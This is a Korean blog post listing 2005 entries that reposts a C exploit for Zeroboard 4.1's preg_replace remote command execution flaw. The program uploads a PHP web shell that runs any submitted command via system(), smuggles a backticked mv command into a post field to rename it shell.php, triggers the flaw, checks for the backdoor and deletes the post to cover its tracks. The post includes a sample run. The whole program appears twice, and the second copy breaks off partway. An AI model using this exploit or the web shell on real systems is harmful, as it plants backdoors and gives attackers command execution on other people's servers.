'분류 전체보기'에 해당되는 글 263건
- 2005.11.15 Zeroboard 4.x "preg_replace" Remote Command Execution Exploit 2
- 2005.11.15 Internet Explorer 'mshtmled.dll' 6.0 Denial Of Service
- 2005.11.15 Yahoo Webmail Vulnerabilty
- 2005.11.14 # - 2k05.11.14 2
- 2005.11.14 위대한 캣츠비
- 2005.11.14 목적? 6
- 2005.11.14 azki's personality #11
- 2005.11.13 그분... 2
- 2005.11.13 Chess.. 1
- 2005.11.07 또다른 나의 발견 -_- 2
2005. 11. 15. 10:09
Zeroboard 4.x "preg_replace" Remote Command Execution Exploit
Date : 31/05/2005
/*
*
----------------------------------------------------------------------------------
[+] Zeroboard preg_replace vulnerability Remote nobody shell exploit
----------------------------------------------------------------------------------
> by n0gada (n0gada@null2root.org)
[*] date : 2005/5/29
[*] the bug
Original advisory:
- http://pandora.sapzil.info/text/notify/20050123.zb41advisory.php
Application
- Zeroboard 4.1 pl2 - 4.1 pl5
Reference:
- http://www.nzeo.com
[*] Target - My test server
$ ./zbexpl http://xxx.xxx.xxx/zboard/zboard.php?id=test
- Target : http://xxx.xxx.xxx/zboard/zboard.php?id=test
[+] xxx.xxx.xxx connecting ok!
[+] Zeroboard writing . ok!
[+] Confirmming your article - found!
[+] Exploiting zeroboard start ............................... Done!
[*] Confirmming your backdoor php script -
http://xxx.xxx.xxx/zboard/data/test/shell.php is generated!
[+] Exploiting success!!
[*] Remove your article - ok! :)
------------------------------------------------------------------------------
*
*/
#include <stdio.h>
#include <stdarg.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/types.h>
#include <signal.h>
#include <time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/select.h>
#include <errno.h>
#define BUFSIZE 4096
#define READSIZE 1500
void ParseZbHost(char *);
void ConnectZboard(char *, unsigned short);
void WriteZboard(void);
void ExploitZboard(void);
void ConfirmPHPScript(void);
void DeleteArticle(void);
void StatusProcess(void);
void Usage(char *);
void OutputErr(char *, int);
char *zb_host;
char *zb_dir;
char *zb_tid;
unsigned short zb_port;
int sockfd = -1;
int reconn=0;
char ReadBuf[READSIZE];
char WriteBuf[BUFSIZE];
char TempBuf[BUFSIZ];
char no[16];
int main(int argc, char *argv[]){
if(argc < 2) Usage(argv[0]);
if(argc > 2) zb_port = atoi(argv[2]);
else zb_port = 80;
// http://host/bbs/zboard.php?id=test
ParseZbHost(argv[1]);
ConnectZboard(zb_host, zb_port);
WriteZboard();
ExploitZboard();
ConfirmPHPScript();
DeleteArticle();
}
void ParseZbHost(char *zbhost)
{
char *psbuf;
char *sptr=NULL;
char *eptr=NULL;
psbuf = malloc(strlen(zbhost)+1);
strcpy(psbuf, zbhost);
if((sptr = strstr(psbuf,"http://")) == NULL) OutputErr("http://host need
", 0);
zb_host = sptr+7;
sptr = strchr(zb_host, '/');
sptr[0] = ' ';
sptr++;
if((eptr = strstr(sptr, "zboard.php?id=")) == NULL) OutputErr(""zboard.php?id="
need
", 0);
zb_tid = eptr+14;
eptr--;
eptr[0] = ' ';
zb_dir = sptr;
fprintf(stdout, " - Target : http://%s/%s/zboard.php?id=%s
", zb_host, zb_dir,
zb_tid);
fflush(stdout);
}
void ConnectZboard(char *server, unsigned short port)
{
struct sockaddr_in serv;
struct hostent *hostname;
if(!(hostname = gethostbyname(server))) OutputErr(server, 1);
if((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) OutputErr("socket", 1);
memset(&serv, 0, sizeof(serv));
serv.sin_family = AF_INET;
serv.sin_port = htons(port);
serv.sin_addr.s_addr = *((unsigned long *)hostname->h_addr_list[0]);
// serv.sin_addr = *((struct in_addr *)hostname->h_addr_list[0]);
if(connect(sockfd, (struct sockaddr *)&serv, sizeof(struct sockaddr)) < 0)
OutputErr("connect", 1);
if(!reconn) fprintf(stdout,"
[+] %s connecting ok!
", server);
else if(reconn == 1) fprintf(stdout, " [+] %s reconnecting ok!
", server);
fflush(stdout);
reconn = 0;
}
void WriteZboard(void)
{
fd_set fds;
struct timeval tv;
int err = -1;
int i = 0;
int cnt=0;
char *tmp_ptr, *ptr;
char form_data[BUFSIZE];
memset(form_data, 0, sizeof(form_data));
sprintf(form_data,
"-----------------------------8ac34985126d8
"
"Content-Disposition: form-data; name="page"
"
"
"
"1
"
"-----------------------------8ac34985126d8
"
"Content-Disposition: form-data; name="id"
"
"
"
"%s
"
"-----------------------------8ac34985126d8
"
"Content-Disposition: form-data; name="no"
"
"
"
"
"
"-----------------------------8ac34985126d8
"
"Content-Disposition: form-data; name="select_arrange"
"
"
"
"headnum
"
"-----------------------------8ac34985126d8
"
"Content-Disposition: form-data; name="desc"
"
"
"
"asc
"
"-----------------------------8ac34985126d8
"
"Content-Disposition: form-data; name="page_num"
"
"
"
"
"
"-----------------------------8ac34985126d8
"
"Content-Disposition: form-data; name="keyword"
"
"
"
"
"
"-----------------------------8ac34985126d8
"
"Content-Disposition: form-data; name="category"
"
"
"
"
"
"-----------------------------8ac34985126d8
"
"Content-Disposition: form-data; name="sn"
"
"
"
"off
"
"-----------------------------8ac34985126d8
"
"Content-Disposition: form-data; name="ss"
"
"
"
"on
"
"-----------------------------8ac34985126d8
"
"Content-Disposition: form-data; name="sc"
"
"
"
"on
"
"-----------------------------8ac34985126d8
"
"Content-Disposition: form-data; name="mode"
"
"
"
"write
"
"-----------------------------8ac34985126d8
"
"Content-Disposition: form-data; name="password"
"
"
"
"1212
"
"-----------------------------8ac34985126d8
"
"Content-Disposition: form-data; name="name"
"
"
"
"zero
"
"-----------------------------8ac34985126d8
"
"Content-Disposition: form-data; name="email"
"
"
"
"zero@nzeo.com
"
"-----------------------------8ac34985126d8
"
"Content-Disposition: form-data; name="homepage"
"
"
"
"
"
"-----------------------------8ac34985126d8
"
"Content-Disposition: form-data; name="subject"
"
"
"
"zero@nzeo.com hi~!
"
"-----------------------------8ac34985126d8
"
"Content-Disposition: form-data; name="memo"
"
"
"
"`mv data/%s/d214924151d9e1ffac5bb2258561031e
data/%s/shell.php`;# 70ab423bfaea846c9db0b96126254103
"
//"-----------------------------8ac34985126d8
"
//"Content-Disposition: form-data; name="sitelink1"
"
//"
"
//"
"
//"-----------------------------8ac34985126d8
"
//"Content-Disposition: form-data; name="sitelink2"
"
//"
"
//"
"
"-----------------------------8ac34985126d8
"
"Content-Disposition: form-data; name="file1";
filename="d214924151d9e1ffac5bb2258561031e"
"
"Content-Type: text/plain
"
"
"
"<?
if(count($_GET)) extract($_GET);
if(count($_POST)) extract($_POST);
if(count($_SERVER)) extract($_SERVER);
echo "<form action=$PHP_SELF method=post>
command : <input type=text name=cmd>
<input type=submit></form><hr>";
if($cmd){
$cmd = str_replace("\", "", $cmd);
echo "<pre>"; system($cmd); echo "</pre>";
}
?>
"
"-----------------------------8ac34985126d8
"
"Content-Disposition: form-data; name="file2"; filename=""
"
"Content-Type: application/octet-stream
"
"
"
"
"
"-----------------------------8ac34985126d8
"
"Content-Disposition: form-data; name="x"
"
"
"
"36
"
"-----------------------------8ac34985126d8
"
"Content-Disposition: form-data; name="y"
"
"
"
"11
"
"-----------------------------8ac34985126d8--
"
, zb_tid, zb_tid, zb_tid);
memset(WriteBuf, 0, sizeof(WriteBuf));
sprintf(WriteBuf,
"POST /%s/write_ok.php HTTP/1.1
"
"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
"
"Referer: http://%s/%s/write.php?id=%s&page=1&sn1=&divpage=1&
sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=&
mode=write&sn1=&divpage=1
"
"Content-Type: multipart/form-data; boundary=---------------------------8ac34985126d8
"
"Accept-Encoding: gzip, deflate
"
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
"
"Host: %s
"
"Content-Length: %d
"
"Connection: Keep-Alive
"
"Cache-Control: no-cache
"
"
""%s", zb_dir, zb_host, zb_dir, zb_tid, zb_host, strlen(form_data), form_data);
fprintf(stdout, " [+] Zeroboard writing ");
fflush(stdout);
if(write(sockfd, WriteBuf, strlen(WriteBuf)) < 0) OutputErr("write", 1);
tv.tv_sec = 60;
tv.tv_usec = 0;
FD_ZERO(&fds);
for(;;){
memset(ReadBuf, 0, sizeof(ReadBuf));
if(i!=0xb33f) StatusProcess();
FD_SET(sockfd, &fds);
if(select(sockfd+1, &fds, NULL, NULL, &tv) <= 0) OutputErr("select", 1);
if(FD_ISSET(sockfd, &fds)){
if(read(sockfd, ReadBuf, sizeof(ReadBuf)) <= 0) OutputErr("read", 1);
if(strstr(ReadBuf, "HTTP/1.1 ")){
if(strstr(ReadBuf+17, "Connection: close
")) reconn = 1;
if(strstr(ReadBuf+9, "200 OK
")) {
err++;
}
else if(strstr(ReadBuf+9, "404 Not Found
")){
OutputErr(" failed!(page not found)
", 0);
}
else if(strstr(ReadBuf+9, "400 Bad Request
")){
OutputErr(" failed!(Bad Request)
", 0);
}
else {
OutputErr(ReadBuf, 0);
}
}
if(err == 0){
if(strstr(ReadBuf,"<meta http-equiv="refresh" content="0; url=zboard.php?id="))
{
fprintf(stdout, " ok!
");
fflush(stdout);
fprintf(stdout," [+] Confirmming your article");
fflush(stdout);
if(tmp_ptr = strstr(ReadBuf+18, "url=")) {
ptr = tmp_ptr+4;
if(ptr != NULL){
if(tmp_ptr = strchr(ptr,'"')) tmp_ptr[0] = ' ';
}
}
if(ptr = strstr(ReadBuf,"=&no=")){
ptr += 5;
memset(no, 0, sizeof(no));
for(i=0; i<16; i++){
if(ptr[i] == '&') break;
no[i] = ptr[i];
}
}
if(strlen(no) > 0){
fprintf(stdout," - found!
");
fflush(stdout);
return;
}
else {
OutputErr(" - failed!(not writed!?!)
", 0);
}
}
else {
if(strstr(ReadBuf,"Total Excuted Time :") && strstr(ReadBuf,"x30x0dx0ax0dx0a")) break;
}
}
else {
OutputErr("err number error
", 0);
}
}
}
fprintf(stderr, " error!
");
}
void ExploitZboard(void)
{
fd_set fds;
struct timeval tv;
int err = -1;
if(reconn == 1) ConnectZboard(zb_host, zb_port);
memset(WriteBuf, 0, sizeof(WriteBuf));
sprintf(WriteBuf,
"GET /%s/view.php?id=%s&page=1&sn1=&divpage=1&sn=off&ss=off&
sc=on&keyword=70ab423bfaea846c9db0b96126254103/e"
, zb_dir, zb_tid);
memcpy(WriteBuf+strlen(WriteBuf), "x25x30x30", 3);
sprintf(WriteBuf+strlen(WriteBuf),
"&select_arrange=headnum&desc=asc&no=%s HTTP/1.1
"
"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash,
application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
"
"Referer: http://%s/%s/zboard.php
"
"Accept-Encoding: gzip, deflate
"
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
"
"Host: %s
"
"Connection: Keep-Alive
"
"
", no, zb_host, zb_dir, zb_host);
fprintf(stdout, " [+] Exploiting zeroboard start ");
fflush(stdout);
if(write(sockfd, WriteBuf, strlen(WriteBuf)) < 0) OutputErr("write", 1);
tv.tv_sec = 60;
tv.tv_usec = 0;
FD_ZERO(&fds);
for(;;){
StatusProcess();
memset(ReadBuf, 0, sizeof(ReadBuf));
FD_SET(sockfd, &fds);
if(select(sockfd+1, &fds, NULL, NULL, &tv) <= 0) OutputErr("select", 1);
if(FD_ISSET(sockfd, &fds)){
if(read(sockfd, ReadBuf, sizeof(ReadBuf)) <= 0) OutputErr("read", 1);
if(strstr(ReadBuf, "HTTP/1.1 ")){
if(strstr(ReadBuf,"Connection: close
")) reconn = 1;
if(strstr(ReadBuf+9, "200 OK
")) {
err++;
}
else if(strstr(ReadBuf+9, "404 Not Found
")){
OutputErr(" failed!(page not found)
", 0);
}
else if(strstr(ReadBuf+9, "400 Bad Request
")){
OutputErr(" failed!(Bad Request)
", 0);
}
else {
OutputErr(ReadBuf, 0);
}
}
if(err >= 0){
if(strstr(ReadBuf,"Total Excuted Time :") && strstr(ReadBuf, "x30x0dx0ax0dx0a")){
fprintf(stdout," Done!
");
fflush(stdout);
return;
}
}
}
}
fprintf(stderr," error!
");
}
void ConfirmPHPScript(void)
{
fd_set fds;
struct timeval tv;
if(reconn == 1) ConnectZboard(zb_host, zb_port);
memset(WriteBuf, 0, sizeof(WriteBuf));
sprintf(WriteBuf,
"GET /%s/data/%s/shell.php HTTP/1.1
"
"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
"
"Referer: http://%s/%s/zboard.php
"
"Accept-Encoding: gzip, deflate
"
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
"
"Host: %s
"
"Connection: Keep-Alive
"
"
", zb_dir, zb_tid, zb_host, zb_dir, zb_host);
fprintf(stdout, " [*] Confirmming your backdoor php script");
fflush(stdout);
if(write(sockfd, WriteBuf, strlen(WriteBuf)) < 0) OutputErr("write", 1);
tv.tv_sec = 60;
tv.tv_usec = 0;
FD_ZERO(&fds);
for(;;){
memset(ReadBuf, 0, sizeof(ReadBuf));
FD_SET(sockfd, &fds);
if(select(sockfd+1, &fds, NULL, NULL, &tv) <= 0) OutputErr("select", 1);
if(FD_ISSET(sockfd, &fds)){
if(read(sockfd, ReadBuf, sizeof(ReadBuf)) <= 0) OutputErr("read", 1);
if(strstr(ReadBuf, "HTTP/1.1 ")){
if(strstr(ReadBuf,"Connection: close
")) reconn = 1;
if(strstr(ReadBuf+9, "200 OK
")) {
fprintf(stdout," - http://%s/%s/data/%s/shell.php is generated!
[+] Exploiting success!!
", zb_host, zb_dir, zb_tid);
fflush(stdout);
return;
}
else if(strstr(ReadBuf+9, "404 Not Found
")){
OutputErr(" - page not found
- 'mv' instruction permission denied.
- zeroboard was patched.
"
" [-] Exploit failed!
", 0);
}
else if(strstr(ReadBuf+9, "400 Bad Request
")){
OutputErr(" - Bad Request
"
" [-] Exploit failed!
", 0);
}
else {
OutputErr(ReadBuf, 0);
}
}
}
}
fprintf(stderr," error!
");
}
void DeleteArticle(void)
{
fd_set fds;
struct timeval tv;
char post_data[BUFSIZ];
if(reconn == 1) ConnectZboard(zb_host, zb_port);
sprintf(post_data,
"page=1&id=%s&no=%s&select_arrange=headnum&desc=asc&page_num=20&keyword=&
category=&sn=off&ss=off&sc=on&mode=&c_no=&password=1212&x=20&y=9
", zb_tid, no);
memset(WriteBuf, 0, sizeof(WriteBuf));
sprintf(WriteBuf,
"POST /%s/delete_ok.php HTTP/1.1
"
"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
"
"Referer: http://%s/%s/delete.php?id=%s&page=1&sn1=&divpage=1&
sn=off&ss=off&sc=on&select_arrange=headnum&desc=asc&no=%s
"
"Content-Type: application/x-www-form-urlencoded
"
"Accept-Encoding: gzip, deflate
"
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
"
"Host: %s
"
"Content-Length: %d
"
"Connection: close
"
"Cache-Control: no-cache
"
"
"
"%s", zb_dir, zb_host, zb_dir, zb_tid, no, zb_host, strlen(post_data), post_data);
fprintf(stdout, " [*] Remove your article ");
fflush(stdout);
if(write(sockfd, WriteBuf, strlen(WriteBuf)) < 0) OutputErr("write", 1);
tv.tv_sec = 60;
tv.tv_usec = 0;
FD_ZERO(&fds);
for(;;){
memset(ReadBuf, 0, sizeof(ReadBuf));
FD_SET(sockfd, &fds);
if(select(sockfd+1, &fds, NULL, NULL, &tv) <= 0) OutputErr("select", 1);
if(FD_ISSET(sockfd, &fds)){
if(read(sockfd, ReadBuf, sizeof(ReadBuf)) <= 0) OutputErr("read", 1);
if(strstr(ReadBuf, "HTTP/1.1 ")){
if(strstr(ReadBuf+9, "200 OK
")) {
if(strstr(ReadBuf+17, "<meta http-equiv="refresh" content="0; url=zboard.php?id=")) {
fprintf(stdout, " - ok! :)
");
fflush(stdout);
return;
}
else{
break;
}
}
else if(strstr(ReadBuf+9, "404 Not Found
")){
OutputErr(" - failed!(page not found)
", 0);
}
else if(strstr(ReadBuf+9, "400 Bad Request
")){
OutputErr(" - failed!(Bad Request)
", 0);
}
else {
fprintf(stderr,"%s", ReadBuf);
exit(1);
}
}
}
}
fprintf(stderr," error!
");
}
void StatusProcess(void)
{
putchar('.');
fflush(stdout);
}
void OutputErr(char *msg, int type)
{
if(!type){
fprintf(stderr,"%s", msg);
fflush(stderr);
}
else if(type==1){
if(!strcmp(msg, zb_host)) herror(msg);
else perror(msg);
}
DeleteArticle();
exit(1);
}
void Usage(char *arg)
{
fprintf(stderr,"[*] Zeroboard preg_replace() vulnerability Remote nobody exploit by n0gada
");
fprintf(stderr,"--------------------------------------------------------------------------
");
fprintf(stderr,"Usage: %s <SERVER> [PORT - default : 80]
", arg);
fprintf(stderr,"--------------------------------------------------------------------------
");
exit(1);
}
Date : 31/05/2005
/*
*
----------------------------------------------------------------------------------
[+] Zeroboard preg_replace vulnerability Remote nobody shell exploit
----------------------------------------------------------------------------------
> by n0gada (n0gada@null2root.org)
[*] date : 2005/5/29
[*] the bug
Original advisory:
- http://pandora.sapzil.info/text/notify/20050123.zb41advisory.php
Application
- Zeroboard 4.1 pl2 - 4.1 pl5
Reference:
- http://www.nzeo.com
[*] Target - My test server
$ ./zbexpl http://xxx.xxx.xxx/zboard/zboard.php?id=test
- Target : http://xxx.xxx.xxx/zboard/zboard.php?id=test
[+] xxx.xxx.xxx connecting ok!
[+] Zeroboard writing . ok!
[+] Confirmming your article - found!
[+] Exploiting zeroboard start ............................... Done!
[*] Confirmming your backdoor php script -
http://xxx.xxx.xxx/zboard/data/test/shell.php is generated!
[+] Exploiting success!!
[*] Remove your article - ok! :)
------------------------------------------------------------------------------
*
*/
#include <stdio.h>
#include <stdarg.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/types.h>
#include <signal.h>
#include <time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/select.h>
#include <errno.h>
#define BUFSIZE 4096
#define READSIZE 1500
void ParseZbHost(char *);
void ConnectZboard(char *, unsigned short);
void WriteZboard(void);
void ExploitZboard(void);
void ConfirmPHPScript(void);
void DeleteArticle(void);
void StatusProcess(void);
void Usage(char *);
void OutputErr(char *, int);
char *zb_host;
char *zb_dir;
char *zb_tid;
unsigned short zb_port;
int sockfd = -1;
int reconn=0;
char ReadBuf[READSIZE];
char WriteBuf[BUFSIZE];
char TempBuf[BUFSIZ];
char no[16];
int main(int argc, char *argv[]){
if(argc < 2) Usage(argv[0]);
if(argc > 2) zb_port = atoi(argv[2]);
else zb_port = 80;
// http://host/bbs/zboard.php?id=test
ParseZbHost(argv[1]);
ConnectZboard(zb_host, zb_port);
WriteZboard();
ExploitZboard();
ConfirmPHPScript();
DeleteArticle();
}
void ParseZbHost(char *zbhost)
{
char *psbuf;
char *sptr=NULL;
char *eptr=NULL;
psbuf = malloc(strlen(zbhost)+1);
strcpy(psbuf, zbhost);
if((sptr = strstr(psbuf,"http://")) == NULL) OutputErr("http://host need
", 0);
zb_host = sptr+7;
sptr = strchr(zb_host, '/');
sptr[0] = ' ';
sptr++;
if((eptr = strstr(sptr, "zboard.php?id=")) == NULL) OutputErr(""zboard.php?id="
need
", 0);
zb_tid = eptr+14;
eptr--;
eptr[0] = ' ';
zb_dir = sptr;
fprintf(stdout, " - Target : http://%s/%s/zboard.php?id=%s
", zb_host, zb_dir,
zb_tid);
fflush(stdout);
}
void ConnectZboard(char *server, unsigned short port)
{
struct sockaddr_in serv;
struct hostent *hostname;
if(!(hostname = gethostbyname(server))) OutputErr(server, 1);
if((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) OutputErr("socket", 1);
memset(&serv, 0, sizeof(serv));
serv.sin_family = AF_INET;
serv.sin_port = htons(port);
serv.sin_addr.s_addr = *((unsigned long *)hostname->h_addr_list[0]);
// serv.sin_addr = *((struct in_addr *)hostname->h_addr_list[0]);
if(connect(sockfd, (struct sockaddr *)&serv, sizeof(struct sockaddr)) < 0)
OutputErr("connect", 1);
if(!reconn) fprintf(stdout,"
[+] %s connecting ok!
", server);
else if(reconn == 1) fprintf(stdout, " [+] %s reconnecting ok!
", server);
fflush(stdout);
reconn = 0;
}
void WriteZboard(void)
{
fd_set fds;
struct timeval tv;
int err = -1;
int i = 0;
int cnt=0;
char *tmp_ptr, *ptr;
char form_data[BUFSIZE];
memset(form_data, 0, sizeof(form_data));
sprintf(form_data,
"-----------------------------8ac34985126d8
"
"Content-Disposition: form-data; name="page"
"
"
"
"1
"
"-----------------------------8ac34985126d8
"
"Content-Disposition: form-data; name="id"
"
"
"
"%s
"
"-----------------------------8ac34985126d8
"
"Content-Disposition: form-data; name="no"
"
"
"
"
"
"-----------------------------8ac34985126d8
"
"Content-Disposition: form-data; name="select_arrange"
"
"
"
"headnum
"
"-----------------------------8ac34985126d8
"
"Content-Disposition: form-data; name="desc"
"
"
"
"asc
"
"-----------------------------8ac34985126d8
"
"Content-Disposition: form-data; name="page_num"
"
"
"
"
"
"-----------------------------8ac34985126d8
"
"Content-Disposition: form-data; name="keyword"
"
"
"
"
"
"-----------------------------8ac34985126d8
"
"Content-Disposition: form-data; name="category"
"
"
"
"
"
"-----------------------------8ac34985126d8
"
"Content-Disposition: form-data; name="sn"
"
"
"
"off
"
"-----------------------------8ac34985126d8
"
"Content-Disposition: form-data; name="ss"
"
"
"
"on
"
"-----------------------------8ac34985126d8
"
"Content-Disposition: form-data; name="sc"
"
"
"
"on
"
"-----------------------------8ac34985126d8
"
"Content-Disposition: form-data; name="mode"
"
"
"
"write
"
"-----------------------------8ac34985126d8
"
"Content-Disposition: form-data; name="password"
"
"
"
"1212
"
"-----------------------------8ac34985126d8
"
"Content-Disposition: form-data; name="name"
"
"
"
"zero
"
"-----------------------------8ac34985126d8
"
"Content-Disposition: form-data; name="email"
"
"
"
"zero@nzeo.com
"
"-----------------------------8ac34985126d8
"
"Content-Disposition: form-data; name="homepage"
"
"
"
"
"
"-----------------------------8ac34985126d8
"
"Content-Disposition: form-data; name="subject"
"
"
"
"zero@nzeo.com hi~!
"
"-----------------------------8ac34985126d8
"
"Content-Disposition: form-data; name="memo"
"
"
"
"`mv data/%s/d214924151d9e1ffac5bb2258561031e
data/%s/shell.php`;# 70ab423bfaea846c9db0b96126254103
"
//"-----------------------------8ac34985126d8
"
//"Content-Disposition: form-data; name="sitelink1"
"
//"
"
//"
"
//"-----------------------------8ac34985126d8
"
//"Content-Disposition: form-data; name="sitelink2"
"
//"
"
//"
"
"-----------------------------8ac34985126d8
"
"Content-Disposition: form-data; name="file1";
filename="d214924151d9e1ffac5bb2258561031e"
"
"Content-Type: text/plain
"
"
"
"<?
if(count($_GET)) extract($_GET);
if(count($_POST)) extract($_POST);
if(count($_SERVER)) extract($_SERVER);
echo "<form action=$PHP_SELF method=post>
command : <input type=text name=cmd>
<input type=submit></form><hr>";
if($cmd){
$cmd = str_replace("\", "", $cmd);
echo "<pre>"; system($cmd); echo "</pre>";
}
?>
"
"-----------------------------8ac34985126d8
"
"Content-Disposition: form-data; name="file2"; filename=""
"
"Content-Type: application/octet-stream
"
"
"
"
"
"-----------------------------8ac34985126d8
"
"Content-Disposition: form-data; name="x"
"
"
"
"36
"
"-----------------------------8ac34985126d8
"
"Content-Disposition: form-data; name="y"
"
"
"
"11
"
"-----------------------------8ac34985126d8--
"
, zb_tid, zb_tid, zb_tid);
memset(WriteBuf, 0, sizeof(WriteBuf));
sprintf(WriteBuf,
"POST /%s/write_ok.php HTTP/1.1
"
"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
"
"Referer: http://%s/%s/write.php?id=%s&page=1&sn1=&divpage=1&
sn=off&ss=on&sc=on&select_arrange=headnum&desc=asc&no=&
mode=write&sn1=&divpage=1
"
"Content-Type: multipart/form-data; boundary=---------------------------8ac34985126d8
"
"Accept-Encoding: gzip, deflate
"
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
"
"Host: %s
"
"Content-Length: %d
"
"Connection: Keep-Alive
"
"Cache-Control: no-cache
"
"
""%s", zb_dir, zb_host, zb_dir, zb_tid, zb_host, strlen(form_data), form_data);
fprintf(stdout, " [+] Zeroboard writing ");
fflush(stdout);
if(write(sockfd, WriteBuf, strlen(WriteBuf)) < 0) OutputErr("write", 1);
tv.tv_sec = 60;
tv.tv_usec = 0;
FD_ZERO(&fds);
for(;;){
memset(ReadBuf, 0, sizeof(ReadBuf));
if(i!=0xb33f) StatusProcess();
FD_SET(sockfd, &fds);
if(select(sockfd+1, &fds, NULL, NULL, &tv) <= 0) OutputErr("select", 1);
if(FD_ISSET(sockfd, &fds)){
if(read(sockfd, ReadBuf, sizeof(ReadBuf)) <= 0) OutputErr("read", 1);
if(strstr(ReadBuf, "HTTP/1.1 ")){
if(strstr(ReadBuf+17, "Connection: close
")) reconn = 1;
if(strstr(ReadBuf+9, "200 OK
")) {
err++;
}
else if(strstr(ReadBuf+9, "404 Not Found
")){
OutputErr(" failed!(page not found)
", 0);
}
else if(strstr(ReadBuf+9, "400 Bad Request
")){
OutputErr(" failed!(Bad Request)
", 0);
}
else {
OutputErr(ReadBuf, 0);
}
}
if(err == 0){
if(strstr(ReadBuf,"<meta http-equiv="refresh" content="0; url=zboard.php?id="))
{
fprintf(stdout, " ok!
");
fflush(stdout);
fprintf(stdout," [+] Confirmming your article");
fflush(stdout);
if(tmp_ptr = strstr(ReadBuf+18, "url=")) {
ptr = tmp_ptr+4;
if(ptr != NULL){
if(tmp_ptr = strchr(ptr,'"')) tmp_ptr[0] = ' ';
}
}
if(ptr = strstr(ReadBuf,"=&no=")){
ptr += 5;
memset(no, 0, sizeof(no));
for(i=0; i<16; i++){
if(ptr[i] == '&') break;
no[i] = ptr[i];
}
}
if(strlen(no) > 0){
fprintf(stdout," - found!
");
fflush(stdout);
return;
}
else {
OutputErr(" - failed!(not writed!?!)
", 0);
}
}
else {
if(strstr(ReadBuf,"Total Excuted Time :") && strstr(ReadBuf,"x30x0dx0ax0dx0a")) break;
}
}
else {
OutputErr("err number error
", 0);
}
}
}
fprintf(stderr, " error!
");
}
void ExploitZboard(void)
{
fd_set fds;
struct timeval tv;
int err = -1;
if(reconn == 1) ConnectZboard(zb_host, zb_port);
memset(WriteBuf, 0, sizeof(WriteBuf));
sprintf(WriteBuf,
"GET /%s/view.php?id=%s&page=1&sn1=&divpage=1&sn=off&ss=off&
sc=on&keyword=70ab423bfaea846c9db0b96126254103/e"
, zb_dir, zb_tid);
memcpy(WriteBuf+strlen(WriteBuf), "x25x30x30", 3);
sprintf(WriteBuf+strlen(WriteBuf),
"&select_arrange=headnum&desc=asc&no=%s HTTP/1.1
"
"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash,
application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
"
"Referer: http://%s/%s/zboard.php
"
"Accept-Encoding: gzip, deflate
"
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
"
"Host: %s
"
"Connection: Keep-Alive
"
"
", no, zb_host, zb_dir, zb_host);
fprintf(stdout, " [+] Exploiting zeroboard start ");
fflush(stdout);
if(write(sockfd, WriteBuf, strlen(WriteBuf)) < 0) OutputErr("write", 1);
tv.tv_sec = 60;
tv.tv_usec = 0;
FD_ZERO(&fds);
for(;;){
StatusProcess();
memset(ReadBuf, 0, sizeof(ReadBuf));
FD_SET(sockfd, &fds);
if(select(sockfd+1, &fds, NULL, NULL, &tv) <= 0) OutputErr("select", 1);
if(FD_ISSET(sockfd, &fds)){
if(read(sockfd, ReadBuf, sizeof(ReadBuf)) <= 0) OutputErr("read", 1);
if(strstr(ReadBuf, "HTTP/1.1 ")){
if(strstr(ReadBuf,"Connection: close
")) reconn = 1;
if(strstr(ReadBuf+9, "200 OK
")) {
err++;
}
else if(strstr(ReadBuf+9, "404 Not Found
")){
OutputErr(" failed!(page not found)
", 0);
}
else if(strstr(ReadBuf+9, "400 Bad Request
")){
OutputErr(" failed!(Bad Request)
", 0);
}
else {
OutputErr(ReadBuf, 0);
}
}
if(err >= 0){
if(strstr(ReadBuf,"Total Excuted Time :") && strstr(ReadBuf, "x30x0dx0ax0dx0a")){
fprintf(stdout," Done!
");
fflush(stdout);
return;
}
}
}
}
fprintf(stderr," error!
");
}
void ConfirmPHPScript(void)
{
fd_set fds;
struct timeval tv;
if(reconn == 1) ConnectZboard(zb_host, zb_port);
memset(WriteBuf, 0, sizeof(WriteBuf));
sprintf(WriteBuf,
"GET /%s/data/%s/shell.php HTTP/1.1
"
"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
"
"Referer: http://%s/%s/zboard.php
"
"Accept-Encoding: gzip, deflate
"
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
"
"Host: %s
"
"Connection: Keep-Alive
"
"
", zb_dir, zb_tid, zb_host, zb_dir, zb_host);
fprintf(stdout, " [*] Confirmming your backdoor php script");
fflush(stdout);
if(write(sockfd, WriteBuf, strlen(WriteBuf)) < 0) OutputErr("write", 1);
tv.tv_sec = 60;
tv.tv_usec = 0;
FD_ZERO(&fds);
for(;;){
